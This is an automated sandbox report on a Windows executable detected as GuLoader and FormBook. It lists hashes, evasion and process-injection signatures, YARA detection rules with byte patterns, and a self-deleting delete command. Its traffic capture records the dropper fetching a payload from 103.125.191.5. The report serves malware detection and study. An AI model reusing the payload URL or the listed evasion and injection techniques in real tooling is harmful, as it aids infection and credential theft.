
Analysis Report 2eD17GZuWs.exe

Overview

General Information

Sample Name: 2eD17GZuWs.exe
Analysis ID: 320425
MD5: c05eee88f0b57e853996957d6523397b
SHA1: fc16fa4ab9a88f7e2405eb9a77d168d9c1b7c8d3
SHA256: 7e70e44956cdb045fd7b5c66eca50996900059fd8851aa76be19a5dd492c6918
Tags: exe, GuLoader

Detection

Detected families: FormBook, GuLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Potential malicious icon found
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected FormBook
Yara detected Generic Dropper
Yara detected GuLoader
Contains functionality to hide a thread from the debugger
Detected RDTSC dummy instruction sequence (likely for instruction hammering)
Hides threads from debuggers
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect Any.run
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Yara detected VB6 Downloader Generic
Abnormal high CPU Usage
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
PE file contains strange resources
Sample file is different than original file name gathered from version info
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Startup

  • System is w10x64
  • 2eD17GZuWs.exe (PID: 4700 cmdline: 'C:\Users\user\Desktop\2eD17GZuWs.exe' MD5: C05EEE88F0B57E853996957D6523397B)
    • 2eD17GZuWs.exe (PID: 2936 cmdline: 'C:\Users\user\Desktop\2eD17GZuWs.exe' MD5: C05EEE88F0B57E853996957D6523397B)
      • explorer.exe (PID: 3424 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • autofmt.exe (PID: 6660 cmdline: C:\Windows\SysWOW64\autofmt.exe MD5: 7FC345F685C2A58283872D851316ACC4)
        • msiexec.exe (PID: 6680 cmdline: C:\Windows\SysWOW64\msiexec.exe MD5: 12C17B5A5C2A7B97342C362CA467E9A2)
          • cmd.exe (PID: 6244 cmdline: /c del 'C:\Users\user\Desktop\2eD17GZuWs.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 5668 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

Columns: Source, Rule, Description, Author, Strings

Source: 0000000D.00000002.932470718.000000000329A000.00000004.00000020.sdmp
Rule: LokiBot_Dropper_Packed_R11_Feb18
Description: Auto-generated rule - file scan copy.pdf.r11
Author: Florian Roth
Strings:
  • 0x22bc:$s1: C:\Program Files (x86)\Microsoft Visual Studio\VB98\VB6.OLB

Source: 0000000D.00000002.935336977.00000000055DF000.00000004.00000001.sdmp
Rule: LokiBot_Dropper_Packed_R11_Feb18
Description: Auto-generated rule - file scan copy.pdf.r11
Author: Florian Roth
Strings:
  • 0x2970:$s1: C:\Program Files (x86)\Microsoft Visual Studio\VB98\VB6.OLB

Source: 00000001.00000002.928588896.0000000002550000.00000040.00000001.sdmp
Rule: JoeSecurity_FormBook
Description: Yara detected FormBook
Author: Joe Security

Source: 00000001.00000002.928588896.0000000002550000.00000040.00000001.sdmp
Rule: Formbook_1
Description: autogenerated rule brought to you by yara-signator
Author: Felix Bilstein - yara-signator at cocacoding dot com
Strings:
  • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x9b52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0xa56a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xb263:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x1b317:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1c31a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

Source: 00000001.00000002.928588896.0000000002550000.00000040.00000001.sdmp
Rule: Formbook
Description: detect Formbook in memory
Author: JPCERT/CC Incident Response Group
Strings:
  • 0x183f9:$sqlite3step: 68 34 1C 7B E1
  • 0x1850c:$sqlite3step: 68 34 1C 7B E1
  • 0x18428:$sqlite3text: 68 38 2A 90 C5
  • 0x1854d:$sqlite3text: 68 38 2A 90 C5
  • 0x1843b:$sqlite3blob: 68 53 D8 7F 8C
  • 0x18563:$sqlite3blob: 68 53 D8 7F 8C

Sigma Overview

No Sigma rule has matched

Signature Overview

AV Detection:

Multi AV Scanner detection for submitted file
Source: 2eD17GZuWs.exe | Virustotal: Detection: 25%
Yara detected FormBook
Source: Yara match | File source: 00000001.00000002.928588896.0000000002550000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.927894177.00000000000A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000D.00000002.931871202.0000000001100000.00000040.00000001.sdmp, type: MEMORY
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 4x nop then pop esi
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 4x nop then pop esi

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic | Snort IDS: 2018752 ET TROJAN Generic .bin download from Dotted Quad 192.168.2.4:49756 -> 103.125.191.5:80
Source: Joe Sandbox View | ASN Name: VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN
Source: global traffic | HTTP traffic detected:
    GET /bin_xMjelaYnr43.bin HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
    Host: 103.125.191.5
    Cache-Control: no-cache
Source: unknown | TCP traffic detected without corresponding DNS query: 103.125.191.5 (50 identical entries)
Source: global traffic | HTTP traffic detected:
    GET /bin_xMjelaYnr43.bin HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
    Host: 103.125.191.5
    Cache-Control: no-cache
Source: 2eD17GZuWs.exe, 00000001.00000002.928458563.000000000093D000.00000004.00000020.sdmp | String found in binary or memory: http://103.125.191.5/
Source: 2eD17GZuWs.exe | String found in binary or memory: http://103.125.191.5/bin_xMjelaYnr43.bin
Source: 2eD17GZuWs.exe, 00000001.00000002.928446229.0000000000924000.00000004.00000020.sdmp | String found in binary or memory: http://103.125.191.5/bin_xMjelaYnr43.binY
Source: explorer.exe, 0000000A.00000000.899103858.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://fontfabrik.com
Source: explorer.exe, 0000000A.00000002.935388452.0000000002B50000.00000002.00000001.sdmp | String found in binary or memory: http://www.%s.comPA
Source: explorer.exe, 0000000A.00000000.899103858.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: explorer.exe, 0000000A.00000000.899103858.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.carterandcone.coml
Source: explorer.exe, 0000000A.00000000.899103858.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com
Source: explorer.exe, 0000000A.00000000.899103858.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers
Source: explorer.exe, 0000000A.00000000.899103858.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/?
Source: explorer.exe, 0000000A.00000000.899103858.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: explorer.exe, 0000000A.00000000.899103858.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
Source: explorer.exe, 0000000A.00000000.899103858.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers8
Source: explorer.exe, 0000000A.00000000.899103858.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers?
Source: explorer.exe, 0000000A.00000000.899103858.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designersG
Source: explorer.exe, 0000000A.00000000.899103858.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.fonts.com
Source: explorer.exe, 0000000A.00000000.899103858.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn
Source: explorer.exe, 0000000A.00000000.899103858.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: explorer.exe, 0000000A.00000000.899103858.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: explorer.exe, 0000000A.00000000.899103858.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: explorer.exe, 0000000A.00000000.899103858.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: explorer.exe, 0000000A.00000000.899103858.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.goodfont.co.kr
Source: explorer.exe, 0000000A.00000000.899103858.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: explorer.exe, 0000000A.00000000.899103858.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.sajatypeworks.com
Source: explorer.exe, 0000000A.00000000.899103858.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.sakkal.com
Source: explorer.exe, 0000000A.00000000.899103858.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.sandoll.co.kr
Source: explorer.exe, 0000000A.00000000.899103858.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.tiro.com
Source: explorer.exe, 0000000A.00000000.899103858.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.typography.netD
Source: explorer.exe, 0000000A.00000000.899103858.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.urwpp.deDPlease
Source: explorer.exe, 0000000A.00000000.899103858.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.zhongyicts.com.cn
Source: 2eD17GZuWs.exe, 00000001.00000002.928394579.00000000008F7000.00000004.00000020.sdmp | String found in binary or memory: https://in_xMjelaYnr43.bin

E-Banking Fraud:

Yara detected FormBook
Source: Yara match | File source: 00000001.00000002.928588896.0000000002550000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.927894177.00000000000A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000D.00000002.931871202.0000000001100000.00000040.00000001.sdmp, type: MEMORY

    System Summary:

    barindex
    Malicious sample detected (through community Yara rule)Show sources
    Source: 0000000D.00000002.932470718.000000000329A000.00000004.00000020.sdmp, type: MEMORYMatched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth
    Source: 0000000D.00000002.935336977.00000000055DF000.00000004.00000001.sdmp, type: MEMORYMatched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth
    Source: 00000001.00000002.928588896.0000000002550000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
    Source: 00000001.00000002.928588896.0000000002550000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
    Source: 00000001.00000002.927894177.00000000000A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
    Source: 00000001.00000002.927894177.00000000000A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
    Source: 0000000D.00000002.931871202.0000000001100000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
    Source: 0000000D.00000002.931871202.0000000001100000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
    Potential malicious icon foundShow sources
    Source: initial sampleIcon embedded in PE file: bad icon match: 20047c7c70f0e004
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeProcess Stats: CPU usage > 98%
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 0_2_021D5A6C NtProtectVirtualMemory,
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 0_2_021D06B1 NtSetInformationThread,TerminateProcess,CreateFileA,
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 0_2_021D5336 NtSetInformationThread,LoadLibraryA,
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 0_2_021D232A NtWriteVirtualMemory,
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 0_2_021D5F9F NtResumeThread,
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 0_2_021D078C NtWriteVirtualMemory,TerminateProcess,
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 0_2_021D044B EnumWindows,NtSetInformationThread,
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 0_2_021D54F4 NtSetInformationThread,NtWriteVirtualMemory,LoadLibraryA,
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 0_2_021D260D NtWriteVirtualMemory,
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 0_2_021D6239 NtResumeThread,
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 0_2_021D62C5 NtResumeThread,
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 0_2_021D2705 NtWriteVirtualMemory,
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 0_2_021D6325 NtResumeThread,
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 0_2_021D0F7D NtWriteVirtualMemory,
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 0_2_021D276A NtWriteVirtualMemory,
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 0_2_021D23D5 NtWriteVirtualMemory,
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 0_2_021D5FC1 NtResumeThread,
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 0_2_021D47EF NtSetInformationThread,
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 0_2_021D5FE5 NtResumeThread,
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 0_2_021D6015 NtResumeThread,
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 0_2_021D6039 NtResumeThread,
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 0_2_021D5435 NtWriteVirtualMemory,
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 0_2_021D2455 NtWriteVirtualMemory,
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 0_2_021D6089 NtResumeThread,
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 0_2_021D24BD NtWriteVirtualMemory,
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 0_2_021D04B2 NtSetInformationThread,
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 0_2_021D60D1 NtResumeThread,
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 0_2_021D04CD NtSetInformationThread,
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 0_2_021D0516 NtSetInformationThread,
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 0_2_021D6106 NtResumeThread,
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 0_2_021D0537 NtSetInformationThread,
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 0_2_021D2531 NtWriteVirtualMemory,
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 0_2_021D059D NtSetInformationThread,
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 0_2_021D05D9 NtSetInformationThread,
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 0_2_021D61ED NtResumeThread,
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E189660 NtAllocateVirtualMemory,LdrInitializeThunk,
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E1896E0 NtFreeVirtualMemory,LdrInitializeThunk,
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E189710 NtQueryInformationToken,LdrInitializeThunk,
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E189780 NtMapViewOfSection,LdrInitializeThunk,
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E1897A0 NtUnmapViewOfSection,LdrInitializeThunk,
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E189540 NtReadFile,LdrInitializeThunk,
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E1895D0 NtClose,LdrInitializeThunk,
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E189A00 NtProtectVirtualMemory,LdrInitializeThunk,
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E189A20 NtResumeThread,LdrInitializeThunk,
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E189A50 NtCreateFile,LdrInitializeThunk,
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E189840 NtDelayExecution,LdrInitializeThunk,
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E189860 NtQuerySystemInformation,LdrInitializeThunk,
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E1898F0 NtReadVirtualMemory,LdrInitializeThunk,
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E189910 NtAdjustPrivilegesToken,LdrInitializeThunk,
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E1899A0 NtCreateSection,LdrInitializeThunk,
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E189610 NtEnumerateValueKey,
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E189650 NtQueryValueKey,
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E189670 NtQueryInformationProcess,
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E1896D0 NtCreateKey,
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E18A710 NtOpenProcessToken,
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E189730 NtQueryVirtualMemory,
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E18A770 NtOpenThread,
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E189770 NtSetInformationFile,
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E189760 NtOpenProcess,
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E189FE0 NtCreateMutant,
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E18AD30 NtSetContextThread,
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E189520 NtWaitForSingleObject,
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E189560 NtWriteFile,
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E1895F0 NtQueryInformationFile,
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E189A10 NtQuerySection,
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E189A80 NtOpenDirectoryObject,
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E189B00 NtSetValueKey,
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E18A3B0 NtGetContextThread,
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E189820 NtEnumerateKey,
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E18B040 NtSuspendThread,
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E1898A0 NtWriteVirtualMemory,
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E189950 NtQueueApcThread,
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_1E1899D0 NtCreateProcessEx,
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_00565A6C NtProtectVirtualMemory,
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_00565F9F NtSetInformationThread,
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_00566015 NtSetInformationThread,
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_00566039 NtSetInformationThread,
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_005660D1 NtSetInformationThread,
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_00566089 NtSetInformationThread,
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_00566106 NtSetInformationThread,
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_005661ED NtSetInformationThread,
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_00566239 NtSetInformationThread,
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_005662C5 NtSetInformationThread,
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_00566325 NtSetInformationThread,
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_00565FC1 NtSetInformationThread,
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: 1_2_00565FE5 NtSetInformationThread,
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_05119540 NtReadFile,LdrInitializeThunk,
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_051195D0 NtClose,LdrInitializeThunk,
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_05119FE0 NtCreateMutant,LdrInitializeThunk,
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_05119660 NtAllocateVirtualMemory,LdrInitializeThunk,
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_051196E0 NtFreeVirtualMemory,LdrInitializeThunk,
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_05119910 NtAdjustPrivilegesToken,LdrInitializeThunk,
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_05119860 NtQuerySystemInformation,LdrInitializeThunk,
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_05119A50 NtCreateFile,LdrInitializeThunk,
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_0511AD30 NtSetContextThread,
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_05119520 NtWaitForSingleObject,
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_05119560 NtWriteFile,
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_051195F0 NtQueryInformationFile,
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_0511A710 NtOpenProcessToken,
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_05119710 NtQueryInformationToken,
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_05119730 NtQueryVirtualMemory,
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_0511A770 NtOpenThread,
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_05119770 NtSetInformationFile,
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_05119760 NtOpenProcess,
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_05119780 NtMapViewOfSection,
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_051197A0 NtUnmapViewOfSection,
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_05119610 NtEnumerateValueKey,
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_05119650 NtQueryValueKey,
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_05119670 NtQueryInformationProcess,
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_051196D0 NtCreateKey,
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_05119950 NtQueueApcThread,
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_051199A0 NtCreateSection,
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_051199D0 NtCreateProcessEx,
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_05119820 NtEnumerateKey,
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_0511B040 NtSuspendThread,
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_05119840 NtDelayExecution,
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_051198A0 NtWriteVirtualMemory,
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_051198F0 NtReadVirtualMemory,
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_05119B00 NtSetValueKey,
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_0511A3B0 NtGetContextThread,
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_05119A10 NtQuerySection,
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_05119A00 NtProtectVirtualMemory,
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_05119A20 NtResumeThread,
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_05119A80 NtOpenDirectoryObject,
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_01119D50 NtCreateFile,
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_01119F30 NtAllocateVirtualMemory,
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_01119E00 NtReadFile,
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_01119E80 NtClose,
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_01119D4B NtCreateFile,
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_01119DA4 NtCreateFile,
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_01119DFE NtReadFile,
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_01119F2B NtAllocateVirtualMemory,
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_01119E7A NtClose,
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: String function: 050DB150 appears 45 times
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeCode function: String function: 1E14B150 appears 66 times
    Source: 2eD17GZuWs.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
    Source: 2eD17GZuWs.exe, 00000000.00000002.691808899.000000000040F000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameLUKENES.exe vs 2eD17GZuWs.exe
    Source: 2eD17GZuWs.exe, 00000000.00000002.691998474.0000000002090000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameuser32j% vs 2eD17GZuWs.exe
    Source: 2eD17GZuWs.exe, 00000001.00000003.926965262.0000000000950000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamemsiexec.exeX vs 2eD17GZuWs.exe
    Source: 2eD17GZuWs.exe, 00000001.00000002.933965294.000000001E3CF000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs 2eD17GZuWs.exe
    Source: 2eD17GZuWs.exe, 00000001.00000002.928375557.00000000008D0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamemswsock.dll.muij% vs 2eD17GZuWs.exe
    Source: 2eD17GZuWs.exe, 00000001.00000000.690796127.000000000040F000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameLUKENES.exe vs 2eD17GZuWs.exe
    Source: 2eD17GZuWs.exeBinary or memory string: OriginalFilenameLUKENES.exe vs 2eD17GZuWs.exe
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dll
    Source: 0000000D.00000002.932470718.000000000329A000.00000004.00000020.sdmp, type: MEMORYMatched rule: LokiBot_Dropper_Packed_R11_Feb18 date = 2018-02-14, hash1 = 3b248d40fd7acb839cc592def1ed7652734e0e5ef93368be3c36c042883a3029, author = Florian Roth, description = Auto-generated rule - file scan copy.pdf.r11, reference = https://app.any.run/tasks/401df4d9-098b-4fd0-86e0-7a52ce6ddbf5, license = https://creativecommons.org/licenses/by-nc/4.0/
